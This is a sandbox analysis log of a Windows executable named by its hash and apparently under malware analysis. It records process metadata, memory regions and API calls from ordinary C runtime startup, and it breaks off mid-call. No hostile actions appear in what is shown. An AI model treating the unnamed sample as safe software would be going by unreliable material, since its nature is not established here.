# Flog Txt Version 1 # Analyzer Version: 4.6.0 # Analyzer Build Date: Jul 8 2022 06:26:21 # Log Creation Date: 05.08.2022 10:52:19.295 Process: id = "1" image_name = "1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe" filename = "c:\\users\\keecfmwgj\\desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe" page_root = "0x4403f000" os_pid = "0xee0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x77c" cmd_line = "\"C:\\Users\\kEecfMwgj\\Desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe\" " cur_dir = "C:\\Users\\kEecfMwgj\\Desktop\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f52a" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 114 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 115 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 116 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 117 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 118 start_va = 0x90000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 119 start_va = 0x190000 end_va = 0x193fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 120 start_va = 0x400000 end_va = 0x253bfff monitored = 1 entry_point = 0x498550 region_type = mapped_file name = "1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe" filename = "\\Users\\kEecfMwgj\\Desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe") Region: id = 121 start_va = 0x76d20000 end_va = 0x76ec8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 122 start_va = 0x76f00000 end_va = 0x7707ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 123 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 124 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 125 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 126 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 127 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 128 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 129 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 269 start_va = 0x1a0000 end_va = 0x21ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 270 start_va = 0x73690000 end_va = 0x736cefff monitored = 0 entry_point = 0x736be088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 271 start_va = 0x73630000 end_va = 0x7368bfff monitored = 0 entry_point = 0x7366f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 272 start_va = 0x73620000 end_va = 0x73627fff monitored = 0 entry_point = 0x736220f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 273 start_va = 0x76b00000 end_va = 0x76c1efff monitored = 0 entry_point = 0x76b15340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 274 start_va = 0x752b0000 end_va = 0x753bffff monitored = 0 entry_point = 0x752c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 275 start_va = 0x76b00000 end_va = 0x76c1efff monitored = 0 entry_point = 0x76b15340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 276 start_va = 0x76b00000 end_va = 0x76c1efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000076b00000" filename = "" Region: id = 277 start_va = 0x76c20000 end_va = 0x76d19fff monitored = 0 entry_point = 0x76c3a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 278 start_va = 0x76c20000 end_va = 0x76d19fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000076c20000" filename = "" Region: id = 279 start_va = 0x220000 end_va = 0x31ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 280 start_va = 0x752b0000 end_va = 0x753bffff monitored = 0 entry_point = 0x752c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 281 start_va = 0x753c0000 end_va = 0x75406fff monitored = 0 entry_point = 0x753c74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 282 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 283 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 284 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 285 start_va = 0x320000 end_va = 0x386fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 286 start_va = 0x76860000 end_va = 0x7695ffff monitored = 0 entry_point = 0x7687b6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 287 start_va = 0x75220000 end_va = 0x752affff monitored = 0 entry_point = 0x75236343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 288 start_va = 0x759c0000 end_va = 0x759c9fff monitored = 0 entry_point = 0x759c36a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 289 start_va = 0x74d40000 end_va = 0x74ddcfff monitored = 0 entry_point = 0x74d73fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 290 start_va = 0x75410000 end_va = 0x754bbfff monitored = 0 entry_point = 0x7541a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 291 start_va = 0x76a60000 end_va = 0x76afffff monitored = 0 entry_point = 0x76a749e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 292 start_va = 0x759a0000 end_va = 0x759b8fff monitored = 0 entry_point = 0x759a4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 293 start_va = 0x76970000 end_va = 0x76a5ffff monitored = 0 entry_point = 0x76980569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 294 start_va = 0x74a50000 end_va = 0x74aaffff monitored = 0 entry_point = 0x74a6a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 295 start_va = 0x74a40000 end_va = 0x74a4bfff monitored = 0 entry_point = 0x74a410e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 296 start_va = 0x2540000 end_va = 0x25effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002540000" filename = "" Region: id = 297 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 298 start_va = 0x25f0000 end_va = 0x2777fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025f0000" filename = "" Region: id = 299 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 300 start_va = 0x75550000 end_va = 0x755affff monitored = 0 entry_point = 0x7556158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 301 start_va = 0x74c40000 end_va = 0x74d0bfff monitored = 0 entry_point = 0x74c4168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 302 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 303 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 304 start_va = 0x2780000 end_va = 0x2900fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002780000" filename = "" Region: id = 305 start_va = 0x2910000 end_va = 0x3d0ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002910000" filename = "" Region: id = 306 start_va = 0x3d10000 end_va = 0x3f0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d10000" filename = "" Region: id = 307 start_va = 0x2540000 end_va = 0x25d1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002540000" filename = "" Region: id = 308 start_va = 0x25e0000 end_va = 0x25effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 309 start_va = 0x3f10000 end_va = 0x431ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003f10000" filename = "" Region: id = 310 start_va = 0x390000 end_va = 0x394fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000390000" filename = "" Region: id = 311 start_va = 0x390000 end_va = 0x394fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000390000" filename = "" Region: id = 312 start_va = 0x3d10000 end_va = 0x3e2afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d10000" filename = "" Region: id = 313 start_va = 0x3f00000 end_va = 0x3f0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003f00000" filename = "" Region: id = 314 start_va = 0x73a10000 end_va = 0x73a8ffff monitored = 0 entry_point = 0x73a237c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 315 start_va = 0x3e30000 end_va = 0x3eaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e30000" filename = "" Region: id = 316 start_va = 0x3f10000 end_va = 0x3feefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003f10000" filename = "" Region: id = 317 start_va = 0x739f0000 end_va = 0x73a02fff monitored = 0 entry_point = 0x739f1d3f region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 318 start_va = 0x390000 end_va = 0x392fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 319 start_va = 0x390000 end_va = 0x390fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Thread: id = 1 os_tid = 0xee4 [0068.057] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff7c | out: lpSystemTimeAsFileTime=0x18ff7c*(dwLowDateTime=0x918bec00, dwHighDateTime=0x1d8a8b9)) [0068.057] GetCurrentProcessId () returned 0xee0 [0068.057] GetCurrentThreadId () returned 0xee4 [0068.057] GetTickCount () returned 0xe663e5 [0068.057] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff74 | out: lpPerformanceCount=0x18ff74*=1519325853485) returned 1 [0068.058] GetStartupInfoW (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\kEecfMwgj\\Desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x18ff84, hStdError=0x49ee10)) [0068.058] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0068.058] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x3f00000 [0068.062] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x752b0000 [0068.062] GetProcAddress (hModule=0x752b0000, lpProcName="FlsAlloc") returned 0x752c4ee3 [0068.062] GetProcAddress (hModule=0x752b0000, lpProcName="FlsGetValue") returned 0x752c1252 [0068.062] GetProcAddress (hModule=0x752b0000, lpProcName="FlsSetValue") returned 0x752c41c0 [0068.062] GetProcAddress (hModule=0x752b0000, lpProcName="FlsFree") returned 0x752c354f [0068.064] RtlAllocateHeap (HeapHandle=0x3f00000, Flags=0x8, Size=0x214) returned 0x3f007d0 [0068.064] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x752b0000 [0068.065] GetCurrentThreadId () returned 0xee4 [0068.065] GetStartupInfoW (in: lpStartupInfo=0x18febc | out: lpStartupInfo=0x18febc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\kEecfMwgj\\Desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x49a6f6, hStdOutput=0x49aa2f, hStdError=0x3f007d0)) [0068.065] RtlAllocateHeap (HeapHandle=0x3f00000, Flags=0x8, Size=0x800) returned 0x3f009f0 [0068.065] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0068.065] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0068.065] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0068.065] SetHandleCount (uNumber=0x20) returned 0x20 [0068.065] GetCommandLineW () returned="\"C:\\Users\\kEecfMwgj\\Desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe\" " [0068.065] GetEnvironmentStringsW () returned 0x231ed8* [0068.066] RtlAllocateHeap (HeapHandle=0x3f00000, Flags=0x0, Size=0xb0e) returned 0x3f011f8 [0068.066] FreeEnvironmentStringsW (penv=0x231ed8) returned 1 [0068.066] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x252b980, nSize=0x104 | out: lpFilename="C:\\Users\\kEecfMwgj\\Desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe")) returned 0x5f [0068.066] RtlAllocateHeap (HeapHandle=0x3f00000, Flags=0x0, Size=0xc8) returned 0x3f01d10 [0068.066] RtlAllocateHeap (HeapHandle=0x3f00000, Flags=0x8, Size=0x98) returned 0x3f01de0 [0068.066] RtlAllocateHeap (HeapHandle=0x3f00000, Flags=0x8, Size=0x3e) returned 0x3f01e80 [0068.066] RtlAllocateHeap (HeapHandle=0x3f00000, Flags=0x8, Size=0x56) returned 0x3f01ec8 [0068.066] RtlAllocateHeap (HeapHandle=0x3f00000, Flags=0x8, Size=0x6e) returned 0x3f01f28 [0068.066] RtlAllocateHeap (HeapHandle=0x3f00000, Flags=0x8, Size=0x78) returned 0x3f01fa0 [0068.066] RtlAllocateHeap (HeapHandle=0x3f00000, Flags=0x8, Size=0x62) returned 0x3f02020 [0068.066] RtlAllocateHeap (HeapHandle=0x3f00000, Flags=0x8, Size=0x30) returned 0x3f02090 [0068.066] RtlAllocateHeap (HeapHandle=0x3f00000, Flags=0x8, Size=0x48) returned 0x3f020c8 [0068.067] RtlAllocateHeap (HeapHandle=0x3f00000, Flags=0x8, Size=0x28) returned 0x3f02118 [0068.067] RtlAllocateHeap (HeapHandle=0x3f00000, Flags=0x8, Size=0x1a) returned 0x3f02148 [0068.067] RtlAllocateHeap (HeapHandle=0x3f00000, Flags=0x8, Size=0x34) returned 0x3f02170 [0068.067] RtlAllocateHeap (HeapHandle=0x3f00000, Flags=0x8, Size=0x5c) returned 0x3f021b0 [0068.067] RtlAllocateHeap (HeapHandle=0x3f00000, Flags=0x8, Size=0x32) returned 0x3f02218 [0068.067] RtlAllocateHeap (HeapHandle=0x3f00000, Flags=0x8, Size=0x2e) returned 0x3f02258 [0068.067] RtlAllocateHeap (HeapHandle=0x3f00000, Flags=0x8, Size=0x1c) returned 0x3f02290 [0068.067] RtlAllocateHeap (HeapHandle=0x3f00000, Flags=0x8, Size=0x12a) returned 0x3f022b8 [0068.067] RtlAllocateHeap (HeapHandle=0x3f00000, Flags=0x8, Size=0x7c) returned 0x3f023f0 [0068.067] RtlAllocateHeap (HeapHandle=0x3f00000, Flags=0x8, Size=0x36) returned 0x3f02478 [0068.067] RtlAllocateHeap (HeapHandle=0x3f00000, Flags=0x8, Size=0x3a) returned 0x3f024b8 [0068.067] RtlAllocateHeap (HeapHandle=0x3f00000, Flags=0x8, Size=0x90) returned 0x3f02500 [0068.067] RtlAllocateHeap (HeapHandle=0x3f00000, Flags=0x8, Size=0x24) returned 0x3f02598 [0068.067] RtlAllocateHeap (HeapHandle=0x3f00000, Flags=0x8, Size=0x30) returned 0x3f025c8 [0068.067] RtlAllocateHeap (HeapHandle=0x3f00000, Flags=0x8, Size=0x36) returned 0x3f02600 [0068.067] RtlAllocateHeap (HeapHandle=0x3f00000, Flags=0x8, Size=0x48) returned 0x3f02640 [0068.067] RtlAllocateHeap (HeapHandle=0x3f00000, Flags=0x8, Size=0x52) returned 0x3f02690 [0068.067] RtlAllocateHeap (HeapHandle=0x3f00000, Flags=0x8, Size=0x3c) returned 0x3f026f0 [0068.067] RtlAllocateHeap (HeapHandle=0x3f00000, Flags=0x8, Size=0xd6) returned 0x3f02738 [0068.067] RtlAllocateHeap (HeapHandle=0x3f00000, Flags=0x8, Size=0x2e) returned 0x3f02818 [0068.067] RtlAllocateHeap (HeapHandle=0x3f00000, Flags=0x8, Size=0x1e) returned 0x3f02850 [0068.067] RtlAllocateHeap (HeapHandle=0x3f00000, Flags=0x8, Size=0x2c) returned 0x3f02878 [0068.067] RtlAllocateHeap (HeapHandle=0x3f00000, Flags=0x8, Size=0x54) returned 0x3f028b0 [0068.067] RtlAllocateHeap (HeapHandle=0x3f00000, Flags=0x8, Size=0x52) returned 0x3f02910 [0068.067] RtlAllocateHeap (HeapHandle=0x3f00000, Flags=0x8, Size=0x2c) returned 0x3f02970 [0068.067] RtlAllocateHeap (HeapHandle=0x3f00000, Flags=0x8, Size=0x26) returned 0x3f029a8 [0068.067] RtlAllocateHeap (HeapHandle=0x3f00000, Flags=0x8, Size=0x3e) returned 0x3f029d8 [0068.067] RtlAllocateHeap (HeapHandle=0x3f00000, Flags=0x8, Size=0x24) returned 0x3f02a20 [0068.067] RtlAllocateHeap (HeapHandle=0x3f00000, Flags=0x8, Size=0x30) returned 0x3f02a50 [0068.067] RtlAllocateHeap (HeapHandle=0x3f00000, Flags=0x8, Size=0x8c) returned 0x3f02a88 [0068.143] HeapFree (in: hHeap=0x3f00000, dwFlags=0x0, lpMem=0x3f011f8 | out: hHeap=0x3f00000) returned 1 [0068.153] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0068.153] RtlAllocateHeap (HeapHandle=0x3f00000, Flags=0x8, Size=0x80) returned 0x3f02b20 [0068.153] RtlAllocateHeap (HeapHandle=0x3f00000, Flags=0x8, Size=0x800) returned 0x3f011f8 [0068.153] GetLastError () returned 0x0 [0068.153] SetLastError (dwErrCode=0x0) [0068.153] GetLastError () returned 0x0 [0068.153] SetLastError (dwErrCode=0x0) [0068.154] GetLastError () returned 0x0 [0068.154] SetLastError (dwErrCode=0x0) [0068.154] GetACP () returned 0x4e4 [0068.154] RtlAllocateHeap (HeapHandle=0x3f00000, Flags=0x0, Size=0x220) returned 0x3f01a00 [0068.154] GetLastError () returned 0x0 [0068.155] SetLastError (dwErrCode=0x0) [0068.155] IsValidCodePage (CodePage=0x4e4) returned 1 [0068.155] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe84 | out: lpCPInfo=0x18fe84) returned 1 [0068.155] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f950 | out: lpCPInfo=0x18f950) returned 1 [0068.155] GetLastError () returned 0x0 [0068.155] SetLastError (dwErrCode=0x0) [0068.155] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0068.156] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0068.156] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0068.156] GetLastError () returned 0x0 [0068.156] SetLastError (dwErrCode=0x0) [0068.156] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0068.156] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ儒櫘᫄JĀ") returned 256 [0068.156] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ儒櫘᫄JĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0068.156] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ儒櫘᫄JĀ", cchSrc=256, lpDestStr=0x18f488, cchDest=256 | out: 